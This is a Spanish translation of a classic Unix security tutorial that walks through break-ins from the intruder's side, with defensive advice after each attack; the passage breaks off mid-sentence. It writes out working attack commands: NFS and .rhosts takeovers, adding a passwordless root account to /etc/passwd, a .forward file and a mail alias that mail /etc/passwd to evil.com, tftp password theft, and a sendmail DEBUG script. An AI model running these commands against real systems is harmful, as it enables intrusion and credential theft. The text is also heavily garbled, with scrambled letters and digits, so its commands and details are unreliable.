G

Introduccin Todos los das, en todo el mundo, las redes de ordenadores y hosts son violados. El nivel de sofisticacin de estos ataques varia ampliamente; mientras hay una creencia generalizada que la mayora de estas intrusiones tienen ito de!ido a la de!ilidad de los pass"ords, hay todava un gran numero de intrusiones que hacen uso de tcnicas mas avanzadas para entrar. #oco es sa!ido acerca de este ultimo tipo de intrusiones , de!ido principalmente a su naturaleza y a su dificultad de ser detectadas. E$T. %$I. The &ic. &'%'. $%(. &(%(. )IT. *unet. +er,eley. #urdue. %un. 'ualquier sistema en Internet -y muchos que no lo est.n/ son suscepti!les de ser violados f.cilmente. 0%on estos o!1etivos inusuales2 03ue ocurri2 *n hom!re1oven, con pelo ru!io y grasiento, sentado en una ha!itacin oscura. 4a ha!itacion esta iluminada solamente por la luz de la pantalla de 56 caracteres de un '75. Tomando otra larga aspiracin de su +enson 8 9edges, su cansado sistema crac,er :Telnetea; a otro site :.mil; annimo de su lista de vctimas. &o importa. Tiene toda la noche<.lo tacha de su lista, y cansinamente teclea la siguiente vctima potencial<. Esta parece ser la imagen ha!itual de un crac,er de sistemas. =oven, sin e periencia, y con un montn de tiempo que perder, tan solo para entrar en otro sistema. %in em!argo, hay un tipo de crac,er mucho mas peligroso rondando por ah. *no que sa!e todo lo ultimo acerca de seguridad de sistemas y herramientas crac,ing, que puede modificarlas para llevar a ca!o ataques especficos, y que puede currarse sus propios programas. *no que no solo se dedica a leer so!re los >ltimos agu1eros de seguridad, sino que tam!ien descu!re !ugs y puntos d!iles. *na :criatura mortal; que puede tanto golpear :envenenadamente; , como ocultar su rastro sin un solo susurro o pista. El ue!ercrac,er esta aqu.. #or que :ue!ercrac,er; 2 Es una idea ro!ada, o!viamente, del ue!ermensch de &ietzsche,o , literalmente traducido al ingles, :over man;. &ietzsche uso el termino no para referirse a un super hom!re de comic, sino a un hom!re que va mas alla de la incompetencia, insignificancia, y de!ilidad del hom!re tradicional. #or lo tanto el ue!ercrac,er es el crac,er de sistemas que ha ido mas alla de los simples metodos de intrusion de los coo,!oo,s. *n ue!ercrac,er no se motiva normalmente para realizar actos violentos. 4as victimas no son ar!itrariamente escogidas ? hay un proposito, tanto como si es por conseguir fines monetarios, un ataque :golpea y corre; para pillar informacion, o un desafio para golpear un prestigioso@gran site o red personalmente. *n ue!ercrac,er es dificil de detectar, mas aun de parar, y aun mas si ca!e de mantenerlo ale1ado de tu site por tu !ien. Avervie" En este te to vamos a realizar un acercamiento inusual a los sistemas de seguridad. En vez de decir meramente que algo es un pro!lema, vamos a mirar a traves de los o1os de un intruso, y ver por que lo es. Bamos a ilustrar que incluso los aparentemente inocuos servicios de red pueden convertirse en herramientas muy valiosas a la hora de !uscar puntos de!iles en un sistema, incluso cuando estos servicios operan del modo esperado. En un esfuerzo por verter algo de luz so!re como ocurren estas intrusiones cada vez mas avanzadas, este te to reseCa varios mecanismos usados actualmente por los crac,ers para o!tener acceso a los sistemas y, adicionalmente, algunas tecnicas que sospechamos estan usando, o hemos usado nosotros mismos en tests o am!ientes autorizadosDamiga!les. &uestra motivacion a la hora de ecri!ir este te to ha sido el hecho de que los administradores de sistemas no son muy a menudo conscientes del peligro e istente por cualquier cosa mas alla de los ataques mas triviales. )ientras por todos es sa!ido que el nivel de proteccion apropiado depende de que es lo que de!e ser protegido, muchos sites parecen estar faltos de los recursos para valorar que nivel de proteccion es adecuada.Eando a conocer lo que los intrusos pueden hacer para ganar acceso a un sistema remoto, intentamos ayudar a los administradores de sistemas a tomar decisiones so!re como proteger su site ? o como no hacerlo. 4imitaremos la discusion a tecnicas que pueden posi!ilitar el acceso a intrusos a shells en un host corriendo *&IF. *na vez hecho esto, los detalles acerca de como conseguir privilegios root estan mas alla del am!ito de este te to ? consideramos que son o dependen del site y, en muchos casos, muy triviales para merecer discutirse. 3ueremos recalcar que no vamos a hacer una lista de !ugs o agu1eros de seguridad ? siempre ha!ra nuevos para que un :atacante; en potencia los e plote. El proposito de este te to es el de tratar de que el lector vea su sistema de una forma nuevaDdiferente ? una forma que posi!lemente le permita tener la oportunidad de entender como su propio sistema puede estar comprometido, y como. Tam!ien queremos reiterar que el proposito de este te to es el de enseCar al lector como testear la seguridad de su propio site, y no como irrumpir en sistemas a1enos. 4as tecnicas de intrusion ilustradas aqu de1aran muy a menudo huellas en los logs de tu sistema ? seria constructivo e aminarlos despues de intentar alguno de estos ataques, para ver como seria un ataque verdadero. 'iertamente otros sites y administradores de sistemas tomaranDharan una vision fugaz de tus actividades si es que decides usar sus hosts para hacer tests de seguridad sin autorizacion avanzada; de hecho, es posi!le que se tomen medidas legales contra tu persona si lo

U
perci!en como un ataque. 9ay cuatro partes principales en este te to. 4a primera es la intoduccion y el overvie". 4a segunda parte es un intento de dar a entender al lector lo que es ser un intruso y como de no sa!er nada de un sistema pasar a compro!ar su seguridad. Esta seccion revisa las tecnicas actuales de o!tencion de informacion y acceso, y cu!re estrategias !asicas tales como e plotar y a!usar de servicios !asicos mal configrados -ftp, mail, tftp, etc./. Tam!ien trata temas un poco mas avanzados, tales como &I% y &H%, asi como !ugs tipicos y pro!lemas de configuracion en cierta forma mas especificos de los sitemas operativos o de los sistemas. Tam!ien se cu!re lo referente a estragegias defensivas contra cada uno de los diferentes ataques.4a tercera seccion trata so!re confianzaI como la seguridad de un sistema depende de la integridad de otros sistemas. 4a confianza es el tema mas comple1o de este te to, y por ser !reves limitaremos su discusion a :los clientes ocultos; -si alguien ha entendido esto ultimo que me lo e plique I//. 4a cuarta seccion cu!re los pasos !asicos a seguir por un administrador de sistemas para proteger su sistema. 4a mayoria de los metodos presentados aqu son meramente de sentido comun, pero son comunmente ignorados en la practica ? una de nuestras metas es enseCar lo peligroso que es ignorar estos metodos !asicos de seguridad. Estudios practicos, indicadores de informacion relacionada con la seguridad, y soft"are son descritos en los apendices al final del documento. )ientras e ploramos los metodos y estrategias que se discuten en este te to vamos a ha!lar del %(T(& - %ecurity (nalysis Tool for (uditing &et"or,s /. Escrito en shell, perl, e pect y ', e amina un host o sets de hosts remotos y recoge tanta informacion como sea posi!le e plorando remotamente &I%, finger, &H%, ftp y tftp, re d, y otros servicios. Esta informacion incluye la presencia de varios servicios de informacion de red asi como de defectos potenciales de seguridad ? normalmente en la forma de errores en el setup o en la configuracion de los servicios de red, !ugs tipicos en las utilidades del sistema o red, o !ien decisiones tacticas po!res o ignorantes. Entonces puede !ien informar so!re estos datos o usar un sistema e perto para investigar mas adelante cualquier pro!lema potencial de seguridad. )ientras el %(T(& no usa todos los metodos discutdos en este te to, ha triunfado con :amenazadora; regularidad a la hora de encontrar serios agu1eros de seguridad en sites de Internet. %era posteado y estara disponi!le via HT# anonimo cuando este completado; El apendice ( cu!re sus caracteristicas mas destacadas. A!servar que no es posi!le cu!rir todos los metodos posi!les de irrumpir en los sistemas en un solo te to. Ee hecho, no vamos a mencionar dos de los metodos mas efectivos de irrupcion en hosts remotosI social engineering - ingenieria social/ y pass"ord crac,ing -crac,ear pass"ords/. Este ultimo metodo es tan efectivo, sin em!argo, que varias de las estrategias presentadas aqu estan !asadas en la o!tencion de archivos de pass"ords.(dicionalmente, mientras los sitemas !asados en ventanas -F, ApenJindo"s, etc../ pueden proveer una :tierra fertil; para la irrupcionDviolacionDe plotacion, simplemente no sa!emos muchos metodos usados para irrumpir en sistemas remotos. )uchos crac,ers de sistemas usan terminales non@!itmapped que les pueden prevenir de usar algunos de los metodos de e plotacion efectiva mas interesantes para sistemas !asados en ventanas -aunque el ser capaz de verDmonitorizar el teclado de la victima es normalmente suficiente para pillar pass"ords/. Hinalmente, mientras gusanos, virus, ca!allos de troya, y demas movidas son muy interesantes, no son comunes - en sistemas !asados en *&IF/ y pro!a!lemente usan tecnicas muy similares a las descritas en este documento como partes individuales de su estrategia de ataque. Kanando Informacion (sumamos que tu eres el administrador de sistema de :Bictim IncorporatedLs net"or, of *ni "or,stations;. En un esfuerzo por proteger tus maquinas, le pides a un colega administrador de sistema de un site cercano -evil.com/ que te de una cuenta en una de sus maquinas para asi poder ver la seguridad de tu propio sistema desde el e terior. 3ue de!erias hacer2 4o primero, tratar de recoger informacion so!re tu !lanco, tu host. 9ay un monton de servicios de red en los que mirarI finger, sho"mount y rpcinfo son !uenos puntos de partida. #ero no te pares ahi ? de!es tam!ien utilizar E&%, "hois, sendmail -smtp/, ftp, uucp, y tantos otros servicios como puedas encontrar. 9ay tantos metodos y tecnicas que el espacio nos impide enseCaros todos, pero trataremos de enseCar una representativa de las estrategias mas comunes yDo peligrosas que hemos visto o que se nos han ocurrido. Idealmente, podrias recoger dicha informacion so!re todos los hosts en la su!red o area de ataque ? la informacion es poder ? pero por ahora e aminaremos solo nuestra victimaD!lanco en cuestion. #ara comenzar, miraremos lo que el comando finger nos ha reportado.-imagina que son las 7pm, 7 &oviem!re, GMMN/I victim O finger Pvictim.com Qvictim.comR 4ogin &ame TTS Idle Jhen zen Er. Hu!ar co Gd Jed 6TI66

Jhere death.com

N
+ienV *n solo usuario inactivo ? se supone que nadie va a notar si intentas irrumpir dentro. (hora intentas mas tacticas. 'omo todos los devotos del finger sa!ran, hacer finger :P;, :6;, y WW, asi como a nom!re comunes, como root, !in, ftp, system, guest, demo, manager, etc<, puede revelar informacion interesante. 4o que esa informacion sea depende de la version de finger que tu victima este usando, pero la mas importante son nom!res de cuentas, con1untamente con sus home directories y el ultimo host desde el que se conectaron. #ara aCadir a esta informacion, puedes tam!ien usar rusers -en particular con la e tension @l / para pillar informacion valiosa so!re usuarios conectados. *sando estos comandos en victim.com nos da la siguiente informacion, presentada de forma ta!ulada comprimida para ahorrar espacioI 4ogin 9ome@dir %hell 4ast login, from "here root D D!inDsh Hri &ov X 6YI5U on ttypG from !ig.victim.com !in D!in &ever logged in no!ody D Tue =un GX 6TIXY on ttypU from server.victim.co daemon D Tue )ar UN GUIG5 on ttyp6 from !ig.victim.com sync D D!inDsync Tue )ar UN GUIG5 on ttyp6 from !ig.victim.com zen DhomeDzen D!inD!ash An since Jed &ov 7 on ttypN from death.com sam DhomeDsam D!inDcsh Jed &ov X 6XINN on ttypN from evil.com guest De portDfoo D!inDsh &ever logged in ftp DhomeDftp &ever logged in Tanto nuestros e perimentos con el %(T(& como el ver en funcionamiento system crac,ers nos ha demostrado que el finger es uno de los servicios mas peligrosos, por su valor a la hora de investigar una victima potencial. Ee todas formas, mucha de esta informacion solamente es valiosa usada con1untamente con otros datos. #or e1emplo, e1ecutando sho"mount -informacion so!re el monta1e de un servidor/en tu victima nos revela lo siguienteI evil O sho"mount @e victim.com e port list for victim.comI De port -everyone/ Dvar -everyone/ Dusr easy De portDe ecD,vmDsun5c.sunos.5.G.N De portDrootDeasy easy De portDs"apDeasy easy

easy

&otar que De portDfoo esta :e portado al mundo;; tam!ien fi1aros que este es el home directory del usuario :guest;. Es hora de tu primera intrusionV En este caso, montaras el home directoy del usuario :guest;. 'omo no tienes la cuenta correspondiente en esa maquina y como root no puede modificar archivos en un sistema de archivos &H%, creas una cuenta :guest; en tu archivo de pass"ord local. 'omo usuario :guest; puedes colocar una :.rhosts entry; en el guest home directory remoto, que te permitira acceder a dicha maquina sin tener que dar ningun pass"ord. evil Z mount victim.comIDe portDfoo Dfoo evil Z cd Dfoo evil Z ls @lag total N G dr" r@ r@ GG root daemon XGU =un GM 6MI5Y . G dr" r@ r@ Y root "heel XGU =ul GM GMMG .. G dr" @@ @@ M G666G daemon G6U5 (ug N GXI5M guest evil Z echo guestI IG666GIGItemporary !rea,in accountIDI [[ DetcDpass"d evil Z ls @lag total N G dr" r@ r@ GG root daemon XGU =un GM 6MI5Y . G dr" r@ r@ Y root "heel XGU =ul GM GMMG .. G dr" @@ @@ M guest daemon G6U5 (ug N GXI5M guest evil Z su guest evil O echo evil.com [[ guestD.rhosts evil O rlogin victim.com Jelcome to victim.comV

5
victim O %i, en lugar de home directories, victim.com e portara sistemas de archivos con comandos de usuario -como , Dusr o DusrDlocalD!in/, podrias reemplazar un comando por un ca!allo de troya que e1ecutara cualquier comando de tu eleccion. El siguiente usuario en e1ecutar dicho comando e1ecutaria tu programa %ugerimos que se e porten estos sistemas de archivosI 4ecturaDe critura solo a clientes especificos y de confianza %olo@lectura, donde sea posi!le -datos o programas pueden ser e portados de esta forma/ %i la victima tiene un :\; "ildcard en su DetcDhosts.equiv -por defecto en varias maquinas/ o tiene el netgroups !ug , cualquier usuario no root con un login en el fichero de pass"ords de la victima puede hacer un rlogin -login remoto/ a la victima sin necesidad de pass"ord. S como el usuario :!in; normalmente tiene ficheros llave y directorios, tu siguiente ataque es el de tratar de acceder en el host de la victima y modificar el fichero de pass"ords para permitirte tener acceso :root;I evil O "hoami !in evil O rsh victim.com csh @i JarningI no access to tty; thus no 1o! control in this shell... victim O ls @ldg Detc dr" r@sr@ T !in staff U65T =ul U5 GTI6U Detc victim O cd Detc victim O mv pass"d p".old victim O -echo toorII6IGIinstant root shellIDID!inDsh; cat p".old / [ pass"d victim O ]E evil O rlogin victim.com @l toor Jelcome to victim.comV victim Z *nas pocas notas so!re el metodo usado arri!a; Wrsh victim.com csh @iW se usa para inicialmente entrar en el sistema ya que no de1a ningun rastro en los ficheros "tmp o utmp, haciendo el comando rsh invisi!le para el finger y el "ho. El shell remoto no esta unido a un pseudo@ terminal, asi que los prgramas tipo pagers y editores fallaran ? pero es de gran utilidad para una !reve e ploracion. 4a utilidad de seguridad 'A#% -ver apendice E/ informara de archivos o directorios que son :escri!i!les; a otras cuentas aparte de la superuser. %i usas %unA% 5. puedes aplicar el patch G66G6N para arreglar muchos de los pro!lemas de permisos de ficheros. En muchos sistemas, rsh lo prue!a en lo e puesto arri!a, aun cuando tenga ito, seguira siendo completamente innotifica!le; el tcp "rapper -apendice E/, que :logea; cone iones entrantes, puede ayudar a desenmascarar dichas actividades. @@@ S ahora que2 9as destapado ya todos los agu1eros del sistema@victima2 Bolviendo a los resultados dados por el finger en nuestra victima, te das cuenta de que tiene una cuenta :ftp;, que normalmente significa que se puede hacer ftp anonimo. Htp anonimo puede ser una forma facil de conseguir acceso, ya que esta muchas veces mal configurado. #or e1emplo, la victima de!e de tener una copia completa del fichero DetcDpass"d en su ftp anonimo @ftpDetc en vez de una version reducida. En este e1emplo, sin em!argo, puedes ver que este ultimo no parece ser el verdadero -como puedes afirmarlo sin ha!er e aminado el archivo2/ %in em!argo, el home directory de :ftp; en victim.com es escri!i!le. Esto te permite e1ecutar comandos remotamente ? en este caso, mandarte el archivo por mail a ti mismo ? por el simple metodo de crear un archivo .for"ard que e1ecuta un comando cuando un mail es mandado a la cuenta :ftp;. evil O cat for"ard^suc,er^file W_D!inDmail zenPevil.com ` DetcDpass"dW evil O ftp victim.com 'onnected to victim.com UU6 victim HT# server ready. &ame -victim.comIzen/I ftp NNG Kuest login o,, send ident as pass"ord. #ass"ordI UN6 Kuest login o,, access restrictions apply. ftp[ ls @lga U66 #A$T command successful. GX6 (%'II data connection for D!inDls -GMU.GMU.GMU.G,GGUM/ -6 !ytes/. total X

X
dr" r@ r@ 5 G6G G XGU =un U6 GMMG . dr" r@ r@ 5 G6G G XGU =un U6 GMMG .. dr" r@ r@ U 6 G XGU =un U6 GMMG !in dr" r@ r@ U 6 G XGU =un U6 GMMG etc dr" r@ r@ N G6G G XGU (ug UU GMMG pu! UU7 (%'II Transfer complete. U5U !ytes received in 6.677 seconds -N.7 a!ytesDs/ ftp[ put for"ard^suc,er^file .for"ard 5N !ytes sent in 6.66GX seconds -UT a!ytesDs/ ftp[ quit evil O echo test _ mail ftpPvictim.com (hora simplemente tienes que esperar a que el fichero de pass"ords te sea enviado. 4a herramienta de seguridad 'A#% chequeara el setup de tu ftp anonimo; mirar la documentacion man so!re ftpd, la documetacionDcodigo de 'A#%, o el 'E$T advisory MNIG6 para recoger informacion acerca de como esta!lecer -setup, por si hay dudas/ ftp anonimo correctamente. Bulnera!ilidades en el ftp son normalmente cusetion de una posesion incorrecta o de los permisos de archivos y directorios. (l menos, estate seguro de que @ftp y todos los directorios y ficheros :system; por de!a1o de @ftp son de root y que no tienen privilegios de escritura para ningun usuario. E aminando ftp, puedes pro!ar un vie1o !ug que en su dia fue !astamente e plotadoI O ftp @n ftp[ open victim.com 'onnected to victim.com UU6 victim.com HT# server ready. ftp[ quote user ftp NNG Kuest login o,, send ident as pass"ord. ftp[ quote c"d broot XN6 #lease login "ith *%E$ and #(%%. ftp[ quote pass ftp UN6 Kuest login o,, access restrictions apply. ftp[ ls @al D -o lo que sea/ %i esto funciona, estaras dentro como root, y con capacidad para modificar el fichero pass"d, o lo que desees. %i tu sistema tiene este !ug, tienes que conseguir un update de tu ftpd daemon, ya sea de tu vendedor o por ftp anonimo en ftp.uu.net. El "uarchive ftpd, un conocido :recam!io; del ftp daemon dado por la Jashington *niversity in %aint 4ouis, tenia casi el mismo pro!lema. %i tu "uarchive ftpd es anterior a (!ril de GMMN, de!erias reemplazarlo por una version mas reciente. hay un programa similar a ftp ? tftp, o trivial file transfer program. Este daemon no necesita de ningun pass"ord para autentificacion; si un host provee de tftp sin restringir el acceso -normalmente mediante algun flag seguro puesto en el archivo inetd.conf/, un atacante podria leer y escri!ir archivos en cualquier lugar del sistema. En el e1emplo, pillas el fichero pass"d y se pone en tu directorio Dtmp localI evil O tftp tftp[ connect victim.com tftp[ get DetcDpass"d DtmpDpass"d.victim tftp[ quit #or el !ien de la seguridad, tftp no de!eria de e1ecutarse; si tftp es necesario, utiliza la opcionDflag segura para restringir el acceso a un directorio que contenga informacion sin valor, o e1ecutalo !a1o el control de un programa chroot "rapper. @@@@@ %i ninguno de los metodos anteriores ha funcionado, es hora de tomar medidas mas drasticas. Tu nuevo amigo es rpcinfo, otro programa de gran utilidad, muchas veces incluso mas practico que el finger. )uchos hosts tienen servicios $#' que pueden ser e plotados; rpcinfo puede ha!lar con el portmapper y enseCarte el camino. #uede decirte si el host esta usando &I%, si es un servidor o esclavo &I%, si hay una estacion de tra!a1o sin disquetera por ahi, si esta usando &H%, cualquiera de los servicios de info -rusersd, rstatd, etc../, o cualquier otro programa inusual -relacionados con logs y seguridad/. #or e1emplo, volviendo a nuestra victimaI evil O rpcinfo @p victim.com program vers proto port G66665 U tcp 7YN ypserv G6666X G udp YUG mountd

7
G6666N G666U7 G666GY U udp U65M nfs G udp YNN !ootparam G tcp GUY5 re d

En este caso, puedes ver varios datos significativos so!re nuestra victima;el primero de los cuales es que es un servidor &I%. #uede que no sea muy sa!ido, pero una vez que se conoce el nom!re de dominio &I% de un servidor, puedes tener cualquiera de sus mapas &I% con una simple orden rpc, incluso cuando estas fuera de la su!red del servidor &I% -por e1emplo, usando el programa S#F que se puede encontrar en los archivos comp.sources.misc en ftp.uu.net/. (dicionalmente, tanto como los facilmente adivina!les pass"ords, muchos sistemas usan nom!res de dominio &I% facilmente adivina!les. Tratar de adivinar el nom!re de dominio &I% es normalmente provechosoDfructifero. 4os mayores candidatos son los nom!res del host en forma parcial y total -e.g. :victim; and :victim.com;, el nom!re de la organizacin, nom!res del grupo dados por el comando :sho"mount;, y demas. %i quisieras pro!ar si el nom!re de dominio fuera :victim;, tecleariasI evil O yp"hich @d victim victim.com Eomain victim not !ound. 'omo se ve este fue un intento sin ito; si huiera sido correcto :victim;, nos ha!ria dado un mensa1e con el nom!re de host del servidor &I%. Ee todas formas, fi1aros de la seccion &H% que victim.com esta e portando el directorio :Dvar; al mundo. Todo lo que se necesita es montar dicho directorio y mirar en el su!directorio :yp; ? entre otras cosas veras otro su!directorio que contiene el nom!re de dominio de la victima. evil Z mount victim.comIDvar Dfoo evil Z cd Dfoo evil Z D!inDls @alg DfooDyp total GY G dr" r@sr@ 5 root staff G dr" r@sr@ GG root staff GG @r" r@ r@ G root staff G dr" r@sr@ U root staff U dr" r@sr@ U root staff Q...R

XGU =ul GU G5IUU . XGU =un UM G6IX5 .. G6MMN (pr UU GGIX7 )a,efile XGU (pr UU GGIU6 !inding GXN7 =ul GU G5IUU foo^!ar

En este caso :foo^!ar; es el nom!re de dominio del &I%. (dicionalmente, los mapas &I% contienen normalmente una !uena lista de nom!res de usuariosDempleados asi como listas de hosts internos, por no mencionar pass"ords para crac,ear.El apendice ' detalla los resultados de un caso practico so!re archivos de pass"ords &I%. @@@@@ #uedes o!servar que la respuesta dada por el comando rpcinfo mostra!a que victim.com usa!a re d. 'omo el rsh daemon, re d procesa peticiones del tipo :por favor e1ecuta este comando como ese usuario -como siendo ese usuario/;. ( diferencia de rshd, re d no tiene en cuenta si el host cliente esta o no en los archivos hosts.equiv o .rhost. &ormalmente el programa re d cliente es el comando :on;, pero tan solo es necesario un pequeCo programa en ' para mandar informacion ar!itraria so!re el host y userid cliente al servidor re d; re d e1ecutara tan contento el comando. #or estas razones, e1ecutar re d es similar a no tener pass"ordsI toda la seguridad esta en el cliente, no en el servidor que es donde de!eria. 4a seguridad del re d puede ser me1orada de alguna manera usando un $#' seguro. @@@@@ !servando de nuevo la respuesta de rpcinfo, puedes o!servar que victim.com parece ser un server para estaciones de tra!a1o sin disqueteras. Esto se evidencia de!ido a la presencia del servicio !ootparam, que provee informacion a los clientes sin disquetera para el arranque. %i lo preguntas correctamente, usando +AAT#($()#$A'^J9A()I y dando la direccion de un cliente, puedes o!tener su nom!re de dominio &I%. Esto puede ser de gran utilidad cuando es com!iando con el hecho de que puedes conseguir mapas &I% ar!itrarios -como el fichero pass"ord/ cuando sa!es el nom!re de dominio. (qu va un e1emplo de codigo para hacer 1usto esoI char cserver; struct !p^"hoami^arg arg; struct !p^"hoami^res res; Dc initializations omitted... cD callrpc-server, +AAT#($()#$AK, +AAT#($()BE$%, +AAT#($()#$A'^J9A()I, dr^!p^"hoami^arg, 8arg, dr^!p^"hoami^res, 8res/; printf-WOs has nisdomain OsdnW, server, res.domain^name/; Dc query cD Dc reply cD

Y
El resultado del comando sho"mount indica!a que :easy; es un cliente sin disquetera de victim.com, asi que usamos su direccion de cliente en el query +AAT#($()#$A'^J9A()II evil O !ootparam victim.com easy.victim.com victim.com has nisdomain foo^!ar @@@@@ 4os &I% masters controlan los alias del mail para el dominio &I% en cuestion. 'omo en los ficheros de alias de mail locales, puedes crear un mail alias que e1ecutara comandos cuando el mail le es mandado-un e1emplo popular de esto es el alias :decode; que :uudecodea; archivos mail que le son mandados/. #or e1emplo, aqu creas un alias :foo;, que mailea el fichero pass"ord de vuelta a evil.com simplemente maileandole cualquier mensa1eI nis@master Z echo efooI W_mail zenPevil.com` DetcDpass"d We [[ DetcDaliases nis@master Z cd DvarDyp nis@master Z ma,e aliases nis@master Z echo test _ mail @v fooPvictim.com #or suerte los atacantes no tendran control de tu &I% master host, pero mas aun laa leccion esta clara ? &I% normalmente no es seguro, pero si un atacante se hace con el control de tu &I% master, efectivamente tendra de los hosts clientes-por e1emplo podra e1ecutar comandos r!itarrios/. &o hay demasiadas defensas contra estos ataques; es un servicio inseguro que casi no tiene autentificacion entre clientes y servers. #ara mas I&$I, parece claro que se pueden forzar mapas aleatorios incluso en servidores maestros -e1, es posi!le tratar a un servidor &I% como si fuera un cliente/. A!viamente, esto echaria a!a1o todos los esquemas. &i es a!solutamente necesario usar &I%, el usar un nom!re de dominio dificil de adivinar facilitaria mucho las cosas, pero si usas clientes sin disquetera que estan e puestos a atacantes en potencia, entonces es insignifante para este atacante el so!repasar este simple paso haciendo uso del truco del !ootparam para conseguir el nom!re de dominio. %i el &I% es usado para propagar los mapas de pass"ords, entonces los shado"ed pass"ords no ofrecen ningun tipo de proteccion adicional ya que el mapa shado" seria aun accesi!le para cualquier atacante que fuera root en un host de ataque.4o meh1or es usar &I% lo menos posi!le, o por lo menos darse cuenta de que los mapas pueden ser o!1eto de lectuta por fuerzas potencialmente hostiles. El tener un protocolo $#' seguro disminuye en gran medida la amenaza, pero tiene sus propios pro!lemas, principalmente en que es dificil de administrar, pero tam!ien en que los metodos de criptologia usados no son muy poderosos. 9ay rumores de que &I%\, el nuevo servicio de informacion de red de %un, soluciona alguno de los pro!lemas, pero hasta ahora se ha limitado a correr !a1o %uns. Hinalmente, el usar filtrado de paquetes-pac,et filtering/en el puerto GGG o secureli! -ver apendice E/, o, para %uns, aplicar el parche G665TU@ 6U de %un, puede tam!ien ayudar. @@@@@ El portmapper -mapeador de puertos/ solo sa!e de servicios $#'. Atros servicios de red pueden ser localizados con el metodo de fuerza !ruta que conecta a todos los puertos de la red. )uchas utilidades de red y sistemas !asados en ventanas :escuchan; en puertos especificos -e1, sendmail esta en el puerto UX, telnet en el UN, F "indo"s normalmente esta en el 7666, etc/.%(T(& incluye un programa que escanea los puertos de un host remoto e informa lo que ha encontrado; si lo e1ecutaras contra nuestra victima verias lo siguienteI evil O tcpmap victim.com )apping GUT.GUT.GUT.G port UGI ftp port UNI telnet port UXI smtp port NYI time port YMI finger port XGUI e ec port XGNI login port XG5I shell port XGXI printer port 7666I -F/ Esto sugiere que victim.com esta corriendo F "indo"s. %i no esta correctamente protegido -por via de la coo,ie magica,magic coo,ie, o por mecanismos host/, el contenido de las ventanas podria capturarse u o!servarse, lo que teclean los usuarios ro!ado, e1ecutar programas

T
remotamente, etc. Tam!ien, si la victima esta usando F "indo"s y acepta un telnet por el puerto 7666 -F/, esto podria ser usado para un ataque de denegacion de servicio -denial of service attac,/, ya que el sistema de ventanas de la victima se suele mantener :congelado; por unos instantes. *n metodo para determinar la vulnera!ilidad de un servidor F -corriendo F "indo"s/ es el de conectarse al mismo por medio de la funcion FApenEisplay-/; si esta nos da como resultado &*44 entonces no puedes acceder al display de la victima -opendisplay es parte de %(T(&/I char chostname; if -FApenEisplay-hostname/ ff &*44/ g printf-W'annot open displayI OsdnW, hostname/; h else g printf-W'an open displayI OsdnW, hostname/; h evil O opendisplay victim.comI6 'annot open displayI victim.comI6 4os terminales F, aunque mucho menos potentes que un sistema *&IF completo, pueden tener sus propios pro!lemas de seguridad. )uchos terminales F permiten accesos rsh no restringidos, permitiendote iniciar programas clientes F en el terminal de la victima apareciendo los resultados en tu propia pantallaI evil O host \ victim.victim.com evil O rsh victim.victim.com telnet victim.com @display evil.com En cualquier caso, dale la misma importancia a la seguridad de tu sistema de ventanas, como a la de tu sistema de archivos y utilidades de red, ya que si no puede comprometer tu sistema igual que un :\; en el host.equiv o una cuenta root sin pass"ord.4o siguiente es e aminar el sendmail. %endmail es un programa muy comple1o que tiene un largo historial de pro!lemas de seguridad, incluyendo el infame comando :"iz; -por suerte hace mucho que se desha!ilito en todas las maquinas/. ( menudo puedes determinar el sistema operativo, a veces hasta la version, de la victima, mirando al numero de version de sendmail. Esto, nos puede dar pistas acerca de como de vulnera!le sera a cualquiera de los muchos !ugs. (dicionalmente, puedes ver si usan el alias :decode;, que posee su propio set de pro!lemasI evil O telnet victim.com UX connecting to host victim.com -GUT.GUT.GUT.G./, port UX connection open UU6 victim.com %endmail %endmail X.XXDvictim ready at Hri,7 &ov MN GTI66 #ET e pn decode UX6 `W_DusrD!inDuudecodeW[ quit El usar el alias :decode; es un riesgo de seguridad ? permite a los atacantes en potencia so!reescri!ir cualquier fichero que fuese escri!i!le por el poseedor de ese alias ? a menudo un daemon, pero potencialmente cualquier usuario. 'onsidera este trozo de mail ? esto pondra a :evil.com; en el archivo .rhost del usuario zen si es que fuera escri!i!le. evil O echo Wevil.comW _ uuencode DhomeDzenD.rhosts _ mail decodePvictim.com %i no se conocen o no hay home directories escri!i!les, una interesante variacion de esto sera la creacion de un archivo DetcDaliases.pag falso que contenga un alias con un comando que quieras e1ecutar en tu victima. Esto puede funcionar de!ido a que en muchos sistemas los archivos aliases.pag y aliases.dir, que controlan los alias de mail del sistema, son escri!i!les para todo el mundo. evil O cat decode !inI W_ cat DetcDpass"d _ mail zenPevil.comW evil O ne"aliases @o3Dtmp @o(ip"diDdecode evil O uuencode decode.pag DetcDaliases.pag _ mail decodePvictom.com evil O DusrDli!Dsendmail @f!in @om @oi !inPvictim.com ` DdevDnull %e pueden encontrar muchas cosas simplemente preguntando a sendmail si una direccion es acepta!le -vrfy/, o hasta donde se e pande una direccion -e pn/. 'uando los servicios de finger o rusers se desa!ilitan, vrfy y e pn pueden todavia ser usados para identificar cuentas de usuarios. Brfy y e pn pueden tam!ien ser usados para descu!rir si el usuario esta e1ecutando mail por medio de cualquier programa

M
suscepti!le de ser e plotado -e1, vacation, mail sorters, etc./. #uede ser una !uena idea el desa!ilitar los comandos vrfy y e pnI en la mayoria de las versiones, mira en el codigo fuente del archivo srvrsmtp.c, y o !ien !orra o cam!ia las dos lineas de la estructura 'mdTa! que tengan los strings :vrfy; y :e pn;. %ites sin codigo pueden tam!ien desa!ilitarlos simplemente editando el e1ecuta!le del sendmail con un editor !inario y reemplazando :vrfy; y :e pn; por espacios en !lanco.El adquirir una version reciente del sendmail -ver apendice E/ es tam!ien una gran idea, puesto que ha ha!ido mas informes so!re !ugs en el sendmail que encualquier otro programa *&IF. os !ugs muy conocidos que de!en ser tratados. El primero fue definitivamente arreglado en la version X.XM de +er,eley; a pesar de los mensa1es de a!a1o, para versiones de sendmail previas a la X.XM, :evil.com; se aCade, a pesar de los mensa1es de error, 1unto con los tipicos headers del mail, al archivo especificadoI O cat evil^sendmail telnet victim.com UX `` EA%) rcpt toI DhomeDzenD.rhosts mail fromI zen data random gar!age . rcpt toI DhomeDzenD.rhosts mail fromI zen data evil.com . quit EA%) evil O D!inDsh evil^sendmail Trying GUT.GUT.GUT.G 'onnected to victim.com Escape character is e]Re. 'onnection closed !y foreign host. evil O rlogin victim.com @l zen Jelcome to victim.comV victim O El segundo agu1ero, recientemente solucionado, permitia a cualquiera especificar comandos ar!itrarios de shell yDo caminos de ruta para el remitente yDo direccion de destino. 4os intentos por mantener los detalles en secreto fueron en vano, y e tensas discusiones en listas de correo o grupos de ne"s de usenet llevaron a revelar como e 